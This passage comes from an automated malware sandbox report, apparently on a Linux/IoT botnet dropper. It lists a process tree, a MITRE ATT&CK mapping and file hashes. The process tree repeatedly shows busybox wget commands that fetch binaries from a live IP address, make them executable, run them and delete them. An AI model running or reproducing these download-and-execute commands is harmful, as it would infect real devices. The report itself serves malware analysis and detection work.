  busybox wget -O i--6.-.86 http://93.123.85.60/i--6.-.86
  2⤵
  - Writes file to tmp directory
  PID:1716
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:1717
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1718
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:1722
- /bin/busybox
  busybox wget -O p--.-pc http://93.123.85.60/p--.-pc
  2⤵
  - Writes file to tmp directory
  PID:1723
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:1724
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:1725
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:1727
- /bin/busybox
  busybox wget -O i5.-.8..-6 http://93.123.85.60/i5.-.8..-6
  2⤵
  - Writes file to tmp directory
  PID:1728
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:1729
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1730
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:1734
- /bin/busybox
  busybox wget -O m.-..-6-.-8k http://93.123.85.60/m.-..-6-.-8k
  2⤵
  - Writes file to tmp directory
  PID:1735
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:1736
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:1737
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:1739
- /bin/busybox
  busybox wget -O s-.-pa.-rc http://93.123.85.60/s-.-pa.-rc
  2⤵
  - Writes file to tmp directory
  PID:1740
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:1741
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:1742
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:1744
- /bin/busybox
  busybox wget -O a-.-r.-m.-4 http://93.123.85.60/a-.-r.-m.-4
  2⤵
  - Writes file to tmp directory
  PID:1745
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:1746
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:1747
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:1749
- /bin/busybox
  busybox wget -O a.-.--.r.--m-.--5 http://93.123.85.60/a.-.--.r.--m-.--5
  2⤵
  - Writes file to tmp directory
  PID:1750
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:1751
- /tmp/a.-.--.r
  ./a.-.--.r
  2⤵
  PID:1752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-.-r.-m.-4

Filesize
132KB

MD5
87074be3414c135350ff3d3a80bbbe5a

SHA1
475a34a061d4f691ed92ce3922768e907c1bb0b0

SHA256
ca364ea893a8309fff313e1558a72af69e5f18f504b24785abf83d524abe5d2f

SHA512
88950226dd3c10dc56f3c1fac23ed7066cd734c569402a25b5b08a62797d2ecd9cfe7f12ee0db5e7eb3cc75bab6aa227d19651d70d666d374c418d6defaeb813

Download Submit
/tmp/a.-.--.r.--m-.--5

Filesize
172KB

MD5
dfcb7b0e806a0469543742ccfa3d49cf

SHA1
adce59a33be26a600906ceab364af45d16627806

SHA256
febfb27dda2dd2ef5bff942591e4217988c7ff387a11b7490119eb230b4cdbe9

SHA512
86bc249178ed959166d85b2313fadc2a4c4d6de1b29c3ff7f1e568fb77a8cf9825855a571988a923bfa6d4d57353a4decfd7602957065beda6c86cbfdca7684b

Download Submit
/tmp/a.-r.-m6

Filesize
172KB

MD5
e346eb40056eb3c499f2437f8a85d278

SHA1
3c76ff0831acc148ab8443bffd659d4b3a80b8c0

SHA256
ed6d520707ff72175f5e44b96e78de20e8db2786cd4c16d686b4fb2aad7c9399

SHA512
2282c2697fda354deabcd5ebed428e969d50e814d7f8981343b76f9481daa5c3a2244e1f1731973d76c87953dbd7028776dcf32f96535c3997f60f4d50f04eea

Download Submit
/tmp/a.r.-.m7

Filesize
172KB

MD5
775b6ccf9472e033fe84591aa0c21db2

SHA1
0d7c2769b792919327181eeb7feb6a656937c4fb

SHA256
ac1bf270cdb899b3dcd0a908d88dfb43547af9b0a6e7449ae84682eb5b5bc8a8

SHA512
c795cdc93d478f4212e1ac85d01b732da1fd8665f2f4dc65af0b97c07cc3dba94b3b492261a4c21c3051c7fd9bfc51a47ea587839e631404f77e56df7d7fd776

Download Submit
/tmp/i--6.-.86

Filesize
104KB

MD5
4458a4194113d28ee91f9f3c3f208953

SHA1
0c361b2f3ce4d54a63a0196c784dc08f13bdfb67

SHA256
9a2e74f26d7ac21d67da82abc9110f6d495b51dbf1fa955aa797a8be958be177

SHA512
fa5a71da90f5b3fbbb865d1251b98884e7320d23afd078281af0736ba111914b1ca35c3dd027826bec2fc95f84938d28dba171f11a1563faf88f636509e8aa16

Download Submit
/tmp/i5.-.8..-6

Filesize
103KB

MD5
958f16f0e3c8147cfba3bb9e4ec3b6be

SHA1
fbd056714dd714b5483a4d1f060acd0310b7c01b

SHA256
4c6d9c9f565b84aff8c92e7defd56371af130c78751adf30cf951f2f6caefc04

SHA512
2372e48ddb1a250416c26f0e943f9cf7ab20b2e781c92a6d81beeb29acd6caab51592cd2b268c6e95678c6e88b499eac141bf868709f3f3233b2144d83b38e25

Download Submit
/tmp/m-.ips

Filesize
173KB

MD5
0f6aed653ea1b2ddf6c62e0d63b9942e

SHA1
8e3e0d4adf81c2504724f18cb54ebc50b8a5219e

SHA256
1b2dcd476d1f2fb510c5ef30f49a680c538ed22a51e066bf81e0201f12d8a6ea

SHA512
6c928b63a9d3ffd3863396bc11c30052e69ece6d1510f9b7ce9e496ca283a36f61d3b92423ef856ad12981021995ddef49e76aa42afe690fa83629fa8e64c1f1

Download Submit
/tmp/m-i.p.-se.l

Filesize
173KB

MD5
e342e6e55fc96346dbf8048bc23be7a2

SHA1
83ecbffacd473393a322380adbc55760b2130bf8

SHA256
1fb9578c41203a3be431f1873875141f0efed6099077f9fd0dc3544b4d21bd74

SHA512
0d088cbec9fa94d424d33d10d9ec82ce8a1d37c2f9eabb0346adc979cb55a1c7b6901867665cbc2364a3cf55f0524c7c91f0b590c724d9e60dea5cf73fb1a2df

Download Submit
/tmp/m.-..-6-.-8k

Filesize
126KB

MD5
2f44adafa80353c8f38cfb6ea4c9e9e1

SHA1
9d35afdb712159b72422dff2759fbb31cdcf3f99

SHA256
6e09f440921f3e370237d543e4066059de6a5fcb009ed0f62ce0e7f02b0e083e

SHA512
427f8d3111e7bcbbcf49b5adb9ba461e196a972c46f38d68424460561a15488f32e7a96a922ec758ef2ab0279409dc870efaa242412dc747204ddddccc058460

Download Submit
/tmp/p--.-pc

Filesize
125KB

MD5
b51e28507453347746992f1012f7badb

SHA1
eab6451ce15aa815a67c648bc9baa109d06d31c4

SHA256
e3e24ba00bfdc85212de8555b7f7a2aad79b1a7f89dc24b9f1153ebc2805a3b6

SHA512
cb84d46bbbb2f8bab4c543851f9b4cdc6e9abc6bdba999b49ae5e0479e10b77f1379d8f719aa43cf4d4d259c68f9e8823ddc2c5ab84cc6f1ac407b0924edd72b

Download Submit
/tmp/p-.-.p.-.c

Filesize
208B

MD5
a7ca1278c23ad0afd81c74cd6fe42282

SHA1
62735e99907c66c544538f2c1b7d8b51a0f405ae

SHA256
e3671fd945a1abbcfc3675aa47a5729d98e8cb452628dfa5bded3cfa378ed2dd

SHA512
3403b6a21253ba88c3744b4736621d42302c94963e0a8c76a535fd710ed6c1453ff032286933aecb3841a7e18078ccb56ffb16ebafacf0046a631f14635ddc42

Download Submit
/tmp/s-.-pa.-rc

Filesize
143KB

MD5
a12ff26787845727f01fff50500fcd76

SHA1
86a910cdf5683f4cbbbcc357c7fab6872775fc67

SHA256
3dccf92e5113cf4cd1422943583406e5b6f7c2cf7207ebe6f4a60fbddc58e8ab

SHA512
0739fc3a2a31e752e1836b4b95682ed72967a983cc986ead9427ca3c3a8dda525b6b0c0047190a89617626a2db80cc2f9ff6525ef976b5897927609c02bc43c2

Download Submit
/tmp/s-..-h-.4

Filesize
119KB

MD5
c63009396462fb713ccbdc1917a1bcde

SHA1
40a39ce6fb7ef7f845d02b747e06cccc0627522d

SHA256
386ecb26e8582f49fb4ee73cdf1201ba7e9aa24f327ccdf18c56eb3a40fa09c0

SHA512
a62e29e238df261fdcabed974841a142ffb5ad7c3845cc6c7af0b8e2c828e31f3e059d401cca667c0784524b7a9e3e325be6af79693d0abd2da17f3b91e6a6b4

Download Submit
/tmp/x.8-.-6.-

Filesize
124KB

MD5
529714109cae9394a028d64b0f4575d1

SHA1
69cf98d8598b6dfaac2d45ef61251db49de80db2

SHA256
e9d283427fe848cc83fbb538fdfcd06f4f92c2f566fc21cf1158ef0a36c56fa4

SHA512
1b808c98534c1c29a5f71761ea1de2299d9fe1c32cf24838ee406354e2e7d68ca8ac1e8c480009c97c41ecff5028fbbdede85a80b21135d888f1d8474224cf6d

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads